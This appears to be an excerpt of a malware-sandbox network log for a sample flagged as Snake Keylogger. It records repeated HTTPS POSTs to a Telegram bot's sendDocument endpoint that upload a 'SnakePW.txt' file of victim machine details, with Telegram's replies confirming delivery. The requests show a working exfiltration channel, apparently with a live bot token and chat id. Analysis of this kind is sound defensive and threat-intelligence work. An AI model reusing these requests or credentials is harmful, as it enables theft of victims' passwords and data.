                                                                    2022-06-26 07:33:56 UTC304OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 32 39 33 38 65 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575702938e2dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:56 UTC304INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:56 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:56 UTC305INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66950,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228836,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    181192.168.2.550042149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:56 UTC305OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575702d65175
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:56 UTC305OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 32 64 36 35 31 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575702d65175Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:56 UTC306INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:56 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:56 UTC306INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66951,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228836,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    182192.168.2.550043149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:56 UTC307OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757030d2640
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:56 UTC307OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 33 30 64 32 36 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757030d2640Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:57 UTC308INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:57 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:57 UTC308INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66952,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228837,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    183192.168.2.550045149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:57 UTC309OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570348c170
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:57 UTC309OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 33 34 38 63 31 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570348c170Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:57 UTC309INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:57 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:57 UTC310INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66954,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228837,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    184192.168.2.550047149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:57 UTC310OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570386be2e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:57 UTC311OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 33 38 36 62 65 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570386be2eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:57 UTC311INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:57 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:57 UTC311INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66955,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228837,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    185192.168.2.550050149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:58 UTC312OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575703c4bbbe
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:58 UTC312OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 33 63 34 62 62 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575703c4bbbeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:58 UTC313INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:58 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:58 UTC313INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66956,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228838,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    186192.168.2.550051149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:58 UTC314OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757040055f7
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:58 UTC314OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 34 30 30 35 35 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757040055f7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:58 UTC314INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:58 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:58 UTC315INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66957,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228838,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    187192.168.2.550054149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:58 UTC315OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575704372bc8
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
